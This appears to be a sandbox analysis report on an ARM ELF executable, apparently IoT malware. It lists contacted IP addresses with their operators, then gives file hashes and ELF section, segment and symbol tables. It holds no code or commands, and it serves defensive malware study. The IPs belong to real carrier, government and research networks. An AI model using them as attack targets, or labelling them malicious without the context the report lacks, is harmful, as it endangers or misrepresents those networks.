                  197.104.91.101
                  unknownSouth Africa
                  37168CELL-CZAfalse
                  197.180.119.53
                  unknownKenya
                  33771SAFARICOM-LIMITEDKEfalse
                  41.123.104.169
                  unknownSouth Africa
                  16637MTNNS-ASZAfalse
                  24.30.148.38
                  unknownUnited States
                  20001TWC-20001-PACWESTUSfalse
                  41.59.61.86
                  unknownTanzania United Republic of
                  327795Tanzania-e-Government-AgencyTZfalse
                  157.114.116.175
                  unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                  157.114.150.95
                  unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                  41.170.38.78
                  unknownSouth Africa
                  328312Deloitte-ASZAfalse
                  58.127.56.107
                  unknownKorea Republic of
                  9318SKB-ASSKBroadbandCoLtdKRfalse
                  157.224.81.251
                  unknownUnited States
                  4704SANNETRakutenMobileIncJPfalse
                  197.179.45.150
                  unknownKenya
                  33771SAFARICOM-LIMITEDKEfalse
                  157.202.152.18
                  unknownUnited States
                  1759TSF-IP-CORETeliaFinlandOyjEUfalse
                  197.55.193.48
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  41.19.31.104
                  unknownSouth Africa
                  29975VODACOM-ZAfalse
                  157.170.48.59
                  unknownUnited States
                  22192SSHENETUSfalse
                  197.168.76.216
                  unknownSouth Africa
                  37168CELL-CZAfalse
                  No context
                  No context
                  No context
                  No context
                  No context
                  No created / dropped files found
                  File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped
                  Entropy (8bit):5.999336187264948
                  TrID:
                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                  File name:k8CCRUs7Yi.elf
                  File size:150610
                  MD5:24ae840c001c6640f8caac05c7e242a4
                  SHA1:fa8b9707a0843bb71e6c0e9227a9363cc00ea606
                  SHA256:3f104601238dda5a4860278edfff7a0fa8460b675278275bae18a13168667029
                  SHA512:9e99469c3af0a64e978fbbacbbea33c6b56344282f4d998ecbceb2c9259d9ed76e10832e45bf67958f0dd7929b866335383be2913862e34c069dba18f8b01ff0
                  SSDEEP:3072:iJLceVpExfBOcUagHbz4NfU9J/NIe1F9kXMknM/9YnAY:iJLcdhUagHbz4NM9JrH9kXMEM/90AY
                  TLSH:18E33B56EA408B13C0D61779B6DF42453323ABA493DB73069928BFB43F8679F4E23905
                  File Content Preview:.ELF..............(.........4...........4. ...(........p.^.......... ... ............................`...`...............`...`...`.......2...............`...`...`..................Q.td..................................-...L..................@-.,@...0....S

                  ELF header

                  Class:
                  Data:
                  Version:
                  Machine:
                  Version Number:
                  Type:
                  OS/ABI:
                  ABI Version:
                  Entry Point Address:
                  Flags:
                  ELF Header Size:
                  Program Header Offset:
                  Program Header Size:
                  Number of Program Headers:
                  Section Header Offset:
                  Section Header Size:
                  Number of Section Headers:
                  Header String Table Index:
                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                  NULL0x00x00x00x00x0000
                  .initPROGBITS0x80d40xd40x100x00x6AX004
                  .textPROGBITS0x80f00xf00x13f400x00x6AX0016
                  .finiPROGBITS0x1c0300x140300x100x00x6AX004
                  .rodataPROGBITS0x1c0400x140400x1e880x00x2A008
                  .ARM.extabPROGBITS0x1dec80x15ec80x180x00x2A004
                  .ARM.exidxARM_EXIDX0x1dee00x15ee00x1200x00x82AL204
                  .eh_framePROGBITS0x260000x160000x40x00x3WA004
                  .tbssNOBITS0x260040x160040x80x00x403WAT004
                  .init_arrayINIT_ARRAY0x260040x160040x40x00x3WA004
                  .fini_arrayFINI_ARRAY0x260080x160080x40x00x3WA004
                  .jcrPROGBITS0x2600c0x1600c0x40x00x3WA004
                  .gotPROGBITS0x260100x160100xa80x40x3WA004
                  .dataPROGBITS0x260b80x160b80x20c0x00x3WA004
                  .bssNOBITS0x262c40x162c40x30240x00x3WA004
                  .commentPROGBITS0x00x162c40xb8c0x00x0001
                  .debug_arangesPROGBITS0x00x16e500x1400x00x0008
                  .debug_pubnamesPROGBITS0x00x16f900x2130x00x0001
                  .debug_infoPROGBITS0x00x171a30x20430x00x0001
                  .debug_abbrevPROGBITS0x00x191e60x6e20x00x0001
                  .debug_linePROGBITS0x00x198c80xe760x00x0001
                  .debug_framePROGBITS0x00x1a7400x2b80x00x0004
                  .debug_strPROGBITS0x00x1a9f80x8ca0x10x30MS001
                  .debug_locPROGBITS0x00x1b2c20x118f0x00x0001
                  .debug_rangesPROGBITS0x00x1c4510x5580x00x0001
                  .ARM.attributesARM_ATTRIBUTES0x00x1c9a90x160x00x0001
                  .shstrtabSTRTAB0x00x1c9bf0x1170x00x0001
                  .symtabSYMTAB0x00x1cf600x53300x100x0287654
                  .strtabSTRTAB0x00x222900x29c20x00x0001
                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                  EXIDX0x15ee00x1dee00x1dee00x1200x1204.50340x4R 0x4.ARM.exidx
                  LOAD0x00x80000x80000x160000x160006.16010x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
                  LOAD0x160000x260000x260000x2c40x32e84.00590x6RW 0x8000.eh_frame .tbss .init_array .fini_array .jcr .got .data .bss
                  TLS0x160040x260040x260040x00x80.00000x4R 0x4.tbss
                  GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                  NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                  .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                  .symtab0x80d40SECTION<unknown>DEFAULT1
                  .symtab0x80f00SECTION<unknown>DEFAULT2
                  .symtab0x1c0300SECTION<unknown>DEFAULT3
                  .symtab0x1c0400SECTION<unknown>DEFAULT4
                  .symtab0x1dec80SECTION<unknown>DEFAULT5
                  .symtab0x1dee00SECTION<unknown>DEFAULT6
                  .symtab0x260000SECTION<unknown>DEFAULT7
                  .symtab0x260040SECTION<unknown>DEFAULT8
                  .symtab0x260040SECTION<unknown>DEFAULT9
                  .symtab0x260080SECTION<unknown>DEFAULT10
                  .symtab0x2600c0SECTION<unknown>DEFAULT11
                  .symtab0x260100SECTION<unknown>DEFAULT12
                  .symtab0x260b80SECTION<unknown>DEFAULT13
                  .symtab0x262c40SECTION<unknown>DEFAULT14
                  .symtab0x00SECTION<unknown>DEFAULT15
                  .symtab0x00SECTION<unknown>DEFAULT16
                  .symtab0x00SECTION<unknown>DEFAULT17
                  .symtab0x00SECTION<unknown>DEFAULT18
                  .symtab0x00SECTION<unknown>DEFAULT19
                  .symtab0x00SECTION<unknown>DEFAULT20
                  .symtab0x00SECTION<unknown>DEFAULT21
                  .symtab0x00SECTION<unknown>DEFAULT22
                  .symtab0x00SECTION<unknown>DEFAULT23
                  .symtab0x00SECTION<unknown>DEFAULT24
                  .symtab0x00SECTION<unknown>DEFAULT25
                  $a.symtab0x80d40NOTYPE<unknown>DEFAULT1
                  $a.symtab0x1c0300NOTYPE<unknown>DEFAULT3
                  $a.symtab0x80e00NOTYPE<unknown>DEFAULT1
                  $a.symtab0x1c03c0NOTYPE<unknown>DEFAULT3
                  $a.symtab0x80f00NOTYPE<unknown>DEFAULT2
                  $a.symtab0x81340NOTYPE<unknown>DEFAULT2
                  $a.symtab0x81940NOTYPE<unknown>DEFAULT2
                  $a.symtab0x81d00NOTYPE<unknown>DEFAULT2
                  $a.symtab0x82cc0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x84240NOTYPE<unknown>DEFAULT2
                  $a.symtab0x86400NOTYPE<unknown>DEFAULT2
                  $a.symtab0x86ac0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x871c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x8aa80NOTYPE<unknown>DEFAULT2
                  $a.symtab0x91700NOTYPE<unknown>DEFAULT2
                  $a.symtab0x981c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x9f0c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0xa6c80NOTYPE<unknown>DEFAULT2
                  $a.symtab0xadc40NOTYPE<unknown>DEFAULT2
                  $a.symtab0xb49c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0xbc380NOTYPE<unknown>DEFAULT2
                  $a.symtab0xbc3c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0xbedc0NOTYPE<unknown>DEFAULT2
                  $a.symtab0xc1bc0NOTYPE<unknown>DEFAULT2
                  $a.symtab0xc8400NOTYPE<unknown>DEFAULT2
                  $a.symtab0xc8900NOTYPE<unknown>DEFAULT2
                  $a.symtab0xc9340NOTYPE<unknown>DEFAULT2
                  $a.symtab0xc9a00NOTYPE<unknown>DEFAULT2
                  $a.symtab0xcbec0NOTYPE<unknown>DEFAULT2
                  $a.symtab0xcdf40NOTYPE<unknown>DEFAULT2
                  $a.symtab0xcec80NOTYPE<unknown>DEFAULT2
                  $a.symtab0xd9e00NOTYPE<unknown>DEFAULT2
                  $a.symtab0xda0c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0xdb500NOTYPE<unknown>DEFAULT2
                  $a.symtab0xdc240NOTYPE<unknown>DEFAULT2
                  $a.symtab0xdcb00NOTYPE<unknown>DEFAULT2
                  $a.symtab0xe7200NOTYPE<unknown>DEFAULT2
                  $a.symtab0xe77c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0xe7e40NOTYPE<unknown>DEFAULT2
                  $a.symtab0xe9200NOTYPE<unknown>DEFAULT2
                  $a.symtab0xe9fc0NOTYPE<unknown>DEFAULT2
                  $a.symtab0xea240NOTYPE<unknown>DEFAULT2
                  $a.symtab0xef2c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0xef500NOTYPE<unknown>DEFAULT2
                  $a.symtab0xeff00NOTYPE<unknown>DEFAULT2
                  $a.symtab0xf0900NOTYPE<unknown>DEFAULT2
                  $a.symtab0xf19c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0xf1c40NOTYPE<unknown>DEFAULT2
                  $a.symtab0xf1fc0NOTYPE<unknown>DEFAULT2
                  $a.symtab0xf2440NOTYPE<unknown>DEFAULT2
                  $a.symtab0xf2680NOTYPE<unknown>DEFAULT2
                  $a.symtab0xf28c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0xf2a80NOTYPE<unknown>DEFAULT2
                  $a.symtab0xf2bc0NOTYPE<unknown>DEFAULT2
                  $a.symtab0xf34c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0xf4dc0NOTYPE<unknown>DEFAULT2
                  $a.symtab0xf6180NOTYPE<unknown>DEFAULT2
                  $a.symtab0xf7140NOTYPE<unknown>DEFAULT2
                  $a.symtab0xf8280NOTYPE<unknown>DEFAULT2
                  $a.symtab0xf83c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0xf8d40NOTYPE<unknown>DEFAULT2
                  $a.symtab0xf9c80NOTYPE<unknown>DEFAULT2
                  $a.symtab0xfa300NOTYPE<unknown>DEFAULT2
                  $a.symtab0xfa440NOTYPE<unknown>DEFAULT2
                  $a.symtab0xfa7c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0xfac00NOTYPE<unknown>DEFAULT2
                  $a.symtab0xfb040NOTYPE<unknown>DEFAULT2
                  $a.symtab0xfb880NOTYPE<unknown>DEFAULT2
                  $a.symtab0xfbc80NOTYPE<unknown>DEFAULT2
                  $a.symtab0xfc2c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0xfc5c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0xfdd40NOTYPE<unknown>DEFAULT2
                  $a.symtab0xfee40NOTYPE<unknown>DEFAULT2
                  $a.symtab0xffb40NOTYPE<unknown>DEFAULT2
                  $a.symtab0x100780NOTYPE<unknown>DEFAULT2
                  $a.symtab0x101280NOTYPE<unknown>DEFAULT2
                  $a.symtab0x102100NOTYPE<unknown>DEFAULT2
                  $a.symtab0x102300NOTYPE<unknown>DEFAULT2
                  $a.symtab0x102640NOTYPE<unknown>DEFAULT2
                  $a.symtab0x102c80NOTYPE<unknown>DEFAULT2
                  $a.symtab0x102fc0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x103cc0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x10b980NOTYPE<unknown>DEFAULT2
                  $a.symtab0x10c380NOTYPE<unknown>DEFAULT2
                  $a.symtab0x10c7c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x10e2c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x10e800NOTYPE<unknown>DEFAULT2
                  $a.symtab0x113f00NOTYPE<unknown>DEFAULT2
                  $a.symtab0x114280NOTYPE<unknown>DEFAULT2
                  $a.symtab0x114f00NOTYPE<unknown>DEFAULT2
                  $a.symtab0x115000NOTYPE<unknown>DEFAULT2
                  $a.symtab0x115100NOTYPE<unknown>DEFAULT2
                  $a.symtab0x115b00NOTYPE<unknown>DEFAULT2
                  $a.symtab0x116100NOTYPE<unknown>DEFAULT2
                  $a.symtab0x116dc0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x117d80NOTYPE<unknown>DEFAULT2
                  $a.symtab0x117f00NOTYPE<unknown>DEFAULT2
                  $a.symtab0x118fc0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1192c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x119540NOTYPE<unknown>DEFAULT2
                  $a.symtab0x119980NOTYPE<unknown>DEFAULT2
                  $a.symtab0x11a0c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x11a500NOTYPE<unknown>DEFAULT2
                  $a.symtab0x11a940NOTYPE<unknown>DEFAULT2
                  $a.symtab0x11b080NOTYPE<unknown>DEFAULT2
                  $a.symtab0x11b4c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x11b940NOTYPE<unknown>DEFAULT2
                  $a.symtab0x11bd40NOTYPE<unknown>DEFAULT2
                  $a.symtab0x11c180NOTYPE<unknown>DEFAULT2
                  $a.symtab0x11c880NOTYPE<unknown>DEFAULT2
                  $a.symtab0x11cd00NOTYPE<unknown>DEFAULT2
                  $a.symtab0x11d580NOTYPE<unknown>DEFAULT2
                  $a.symtab0x11d9c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x11e0c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x11e580NOTYPE<unknown>DEFAULT2
                  $a.symtab0x11ee00NOTYPE<unknown>DEFAULT2
                  $a.symtab0x11f280NOTYPE<unknown>DEFAULT2
                  $a.symtab0x11f6c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1291c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x12a5c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x12e1c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x132bc0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x132fc0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x134240NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1343c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x134e00NOTYPE<unknown>DEFAULT2
                  $a.symtab0x135980NOTYPE<unknown>DEFAULT2
                  $a.symtab0x136580NOTYPE<unknown>DEFAULT2
                  $a.symtab0x136fc0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1378c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x138640NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1395c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x13a480NOTYPE<unknown>DEFAULT2
                  $a.symtab0x13b0c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x13c580NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1427c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x146480NOTYPE<unknown>DEFAULT2
                  $a.symtab0x146e00NOTYPE<unknown>DEFAULT2
                  $a.symtab0x147280NOTYPE<unknown>DEFAULT2
                  $a.symtab0x148180NOTYPE<unknown>DEFAULT2
                  $a.symtab0x149540NOTYPE<unknown>DEFAULT2
                  $a.symtab0x149ac0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x149b40NOTYPE<unknown>DEFAULT2
                  $a.symtab0x149e40NOTYPE<unknown>DEFAULT2
                  $a.symtab0x14a3c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x14a440NOTYPE<unknown>DEFAULT2
                  $a.symtab0x14a740NOTYPE<unknown>DEFAULT2
                  $a.symtab0x14acc0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x14ad40NOTYPE<unknown>DEFAULT2
                  $a.symtab0x14b040NOTYPE<unknown>DEFAULT2
                  $a.symtab0x14b5c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x14b640NOTYPE<unknown>DEFAULT2
                  $a.symtab0x14b900NOTYPE<unknown>DEFAULT2
                  $a.symtab0x14c180NOTYPE<unknown>DEFAULT2
                  $a.symtab0x14cf40NOTYPE<unknown>DEFAULT2
                  $a.symtab0x14db40NOTYPE<unknown>DEFAULT2
                  $a.symtab0x14e080NOTYPE<unknown>DEFAULT2
                  $a.symtab0x14e600NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1524c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x153a00NOTYPE<unknown>DEFAULT2
                  $a.symtab0x158ec0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x159700NOTYPE<unknown>DEFAULT2
                  $a.symtab0x159ec0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x15a180NOTYPE<unknown>DEFAULT2
                  $a.symtab0x15aa00NOTYPE<unknown>DEFAULT2
                  $a.symtab0x15aa80NOTYPE<unknown>DEFAULT2
                  $a.symtab0x15ab40NOTYPE<unknown>DEFAULT2
                  $a.symtab0x15ac00NOTYPE<unknown>DEFAULT2
                  $a.symtab0x15ad00NOTYPE<unknown>DEFAULT2
                  $a.symtab0x15b100NOTYPE<unknown>DEFAULT2
                  $a.symtab0x15b500NOTYPE<unknown>DEFAULT2
                  $a.symtab0x15bb40NOTYPE<unknown>DEFAULT2
                  $a.symtab0x15c540NOTYPE<unknown>DEFAULT2
                  $a.symtab0x15c800NOTYPE<unknown>DEFAULT2
                  $a.symtab0x15c940NOTYPE<unknown>DEFAULT2
                  $a.symtab0x15ca80NOTYPE<unknown>DEFAULT2
                  $a.symtab0x15cbc0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x15ce40NOTYPE<unknown>DEFAULT2
                  $a.symtab0x15d1c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x15d5c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x15d700NOTYPE<unknown>DEFAULT2
                  $a.symtab0x15db40NOTYPE<unknown>DEFAULT2
                  $a.symtab0x15df40NOTYPE<unknown>DEFAULT2
                  $a.symtab0x15e340NOTYPE<unknown>DEFAULT2
                  $a.symtab0x15e940NOTYPE<unknown>DEFAULT2
                  $a.symtab0x15ed40NOTYPE<unknown>DEFAULT2
                  $a.symtab0x15f400NOTYPE<unknown>DEFAULT2
                  $a.symtab0x15fcc0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x15fe00NOTYPE<unknown>DEFAULT2
                  $a.symtab0x160200NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1609c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x161880NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1652c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x165800NOTYPE<unknown>DEFAULT2
                  $a.symtab0x165a40NOTYPE<unknown>DEFAULT2
                  $a.symtab0x166600NOTYPE<unknown>DEFAULT2
                  $a.symtab0x169900NOTYPE<unknown>DEFAULT2
                  $a.symtab0x169b00NOTYPE<unknown>DEFAULT2
                  $a.symtab0x16e100NOTYPE<unknown>DEFAULT2
                  $a.symtab0x16f500NOTYPE<unknown>DEFAULT2
                  $a.symtab0x16fd00NOTYPE<unknown>DEFAULT2
                  $a.symtab0x171340NOTYPE<unknown>DEFAULT2
                  $a.symtab0x172100NOTYPE<unknown>DEFAULT2
                  $a.symtab0x172400NOTYPE<unknown>DEFAULT2
                  $a.symtab0x172b40NOTYPE<unknown>DEFAULT2
                  $a.symtab0x172e00NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1743c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x17c300NOTYPE<unknown>DEFAULT2
                  $a.symtab0x17d740NOTYPE<unknown>DEFAULT2
                  $a.symtab0x17e900NOTYPE<unknown>DEFAULT2
                  $a.symtab0x181400NOTYPE<unknown>DEFAULT2
                  $a.symtab0x184ec0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x186180NOTYPE<unknown>DEFAULT2
                  $a.symtab0x186c00NOTYPE<unknown>DEFAULT2
                  $a.symtab0x18b500NOTYPE<unknown>DEFAULT2
                  $a.symtab0x18b700NOTYPE<unknown>DEFAULT2
                  $a.symtab0x18c600NOTYPE<unknown>DEFAULT2
                  $a.symtab0x18d400NOTYPE<unknown>DEFAULT2
                  $a.symtab0x18e300NOTYPE<unknown>DEFAULT2
                  $a.symtab0x18f1c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x18f600NOTYPE<unknown>DEFAULT2
                  $a.symtab0x18fb00NOTYPE<unknown>DEFAULT2
                  $a.symtab0x18ffc0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x190740NOTYPE<unknown>DEFAULT2
                  $a.symtab0x190b40NOTYPE<unknown>DEFAULT2
                  $a.symtab0x190d80NOTYPE<unknown>DEFAULT2
                  $a.symtab0x191540NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1924c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x192c40NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1932c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x195800NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1958c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x195c40NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1961c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x196740NOTYPE<unknown>DEFAULT2
                  $a.symtab0x196800NOTYPE<unknown>DEFAULT2
                  $a.symtab0x197600NOTYPE<unknown>DEFAULT2
                  $a.symtab0x197980NOTYPE<unknown>DEFAULT2
                  $a.symtab0x198e00NOTYPE<unknown>DEFAULT2
                  $a.symtab0x199040NOTYPE<unknown>DEFAULT2
                  $a.symtab0x19ac40NOTYPE<unknown>DEFAULT2
                  $a.symtab0x19b1c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x19bf80NOTYPE<unknown>DEFAULT2
                  $a.symtab0x19cc00NOTYPE<unknown>DEFAULT2
                  $a.symtab0x19cf00NOTYPE<unknown>DEFAULT2
                  $a.symtab0x19d940NOTYPE<unknown>DEFAULT2
                  $a.symtab0x19dd00NOTYPE<unknown>DEFAULT2
                  $a.symtab0x19df40NOTYPE<unknown>DEFAULT2
                  $a.symtab0x19ea40NOTYPE<unknown>DEFAULT2
                  $a.symtab0x19ee40NOTYPE<unknown>DEFAULT2
                  $a.symtab0x19f540NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1a0980NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1a4b40NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1a9500NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1aa900NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1aae40NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1ab300NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1ab7c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1ab840NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1ab880NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1abb40NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1abc00NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1abcc0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1adec0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1af3c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1af580NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1afb80NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1b0240NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1b0dc0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1b0fc0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1b2400NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1b7880NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1b7900NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1b7980NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1b7a00NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1b85c0NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1b8a00NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1bfb40NOTYPE<unknown>DEFAULT2
                  $a.symtab0x1bffc0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x81280NOTYPE<unknown>DEFAULT2
                  $d.symtab0x260080NOTYPE<unknown>DEFAULT10
                  $d.symtab0x81800NOTYPE<unknown>DEFAULT2
                  $d.symtab0x260040NOTYPE<unknown>DEFAULT9
                  $d.symtab0x81c40NOTYPE<unknown>DEFAULT2
                  $d.symtab0x82c40NOTYPE<unknown>DEFAULT2
                  $d.symtab0x84200NOTYPE<unknown>DEFAULT2
                  $d.symtab0x8a740NOTYPE<unknown>DEFAULT2
                  $d.symtab0x916c0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x98180NOTYPE<unknown>DEFAULT2
                  $d.symtab0x9f080NOTYPE<unknown>DEFAULT2
                  $d.symtab0xa6c40NOTYPE<unknown>DEFAULT2
                  $d.symtab0xadc00NOTYPE<unknown>DEFAULT2
                  $d.symtab0xb4980NOTYPE<unknown>DEFAULT2
                  $d.symtab0xbc300NOTYPE<unknown>DEFAULT2
                  $d.symtab0xc1b80NOTYPE<unknown>DEFAULT2
                  $d.symtab0xc7e80NOTYPE<unknown>DEFAULT2
                  $d.symtab0x260b80NOTYPE<unknown>DEFAULT13
                  $d.symtab0xc9900NOTYPE<unknown>DEFAULT2
                  $d.symtab0xcbd40NOTYPE<unknown>DEFAULT2
                  $d.symtab0xcdd00NOTYPE<unknown>DEFAULT2
                  $d.symtab0x260bc0NOTYPE<unknown>DEFAULT13
                  $d.symtab0xcec40NOTYPE<unknown>DEFAULT2
                  $d.symtab0xd9bc0NOTYPE<unknown>DEFAULT2
                  $d.symtab0xda080NOTYPE<unknown>DEFAULT2
                  $d.symtab0xdc200NOTYPE<unknown>DEFAULT2
                  $d.symtab0xdca80NOTYPE<unknown>DEFAULT2
                  $d.symtab0xe6940NOTYPE<unknown>DEFAULT2
                  $d.symtab0x260c00NOTYPE<unknown>DEFAULT13
                  $d.symtab0x260c40NOTYPE<unknown>DEFAULT13
                  $d.symtab0x260c80NOTYPE<unknown>DEFAULT13
                  $d.symtab0x1cd840NOTYPE<unknown>DEFAULT4
                  $d.symtab0x1cda40NOTYPE<unknown>DEFAULT4
                  $d.symtab0x1cdb00NOTYPE<unknown>DEFAULT4
                  $d.symtab0x1cdbc0NOTYPE<unknown>DEFAULT4
                  $d.symtab0xe76c0NOTYPE<unknown>DEFAULT2
                  $d.symtab0xe7d40NOTYPE<unknown>DEFAULT2
                  $d.symtab0xe9080NOTYPE<unknown>DEFAULT2
                  $d.symtab0xe9ec0NOTYPE<unknown>DEFAULT2
                  $d.symtab0xef4c0NOTYPE<unknown>DEFAULT2
                  $d.symtab0xefe80NOTYPE<unknown>DEFAULT2
                  $d.symtab0xf0880NOTYPE<unknown>DEFAULT2
                  $d.symtab0xf1800NOTYPE<unknown>DEFAULT2
                  $d.symtab0x260cc0NOTYPE<unknown>DEFAULT13
                  $d.symtab0xf3480NOTYPE<unknown>DEFAULT2
                  $d.symtab0xf4d40NOTYPE<unknown>DEFAULT2
                  $d.symtab0x00NOTYPE<unknown>DEFAULT21
                  $d.symtab0x200NOTYPE<unknown>DEFAULT21
                  $d.symtab0x260NOTYPE<unknown>DEFAULT21
                  $d.symtab0xf8cc0NOTYPE<unknown>DEFAULT2
                  $d.symtab0xf9b80NOTYPE<unknown>DEFAULT2
                  $d.symtab0xfa280NOTYPE<unknown>DEFAULT2
                  $d.symtab0xfa780NOTYPE<unknown>DEFAULT2
                  $d.symtab0xfabc0NOTYPE<unknown>DEFAULT2
                  $d.symtab0xfb000NOTYPE<unknown>DEFAULT2
                  $d.symtab0xfb800NOTYPE<unknown>DEFAULT2
                  $d.symtab0xfbc40NOTYPE<unknown>DEFAULT2
                  $d.symtab0xfc280NOTYPE<unknown>DEFAULT2
                  $d.symtab0xfec80NOTYPE<unknown>DEFAULT2
                  $d.symtab0xffac0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x1006c0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x101200NOTYPE<unknown>DEFAULT2
                  $d.symtab0x1ce5c0NOTYPE<unknown>DEFAULT4
                  $d.symtab0x101fc0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x1022c0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x102600NOTYPE<unknown>DEFAULT2
                  $d.symtab0x102bc0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x103c40NOTYPE<unknown>DEFAULT2
                  $d.symtab0x10b740NOTYPE<unknown>DEFAULT2
                  $d.symtab0x1ce9c0NOTYPE<unknown>DEFAULT4
                  $d.symtab0x10e280NOTYPE<unknown>DEFAULT2
                  $d.symtab0x10e740NOTYPE<unknown>DEFAULT2
                  $d.symtab0x113c00NOTYPE<unknown>DEFAULT2
                  $d.symtab0x260d00NOTYPE<unknown>DEFAULT13
                  $d.symtab0x1cea40NOTYPE<unknown>DEFAULT4
                  $d.symtab0x114e00NOTYPE<unknown>DEFAULT2
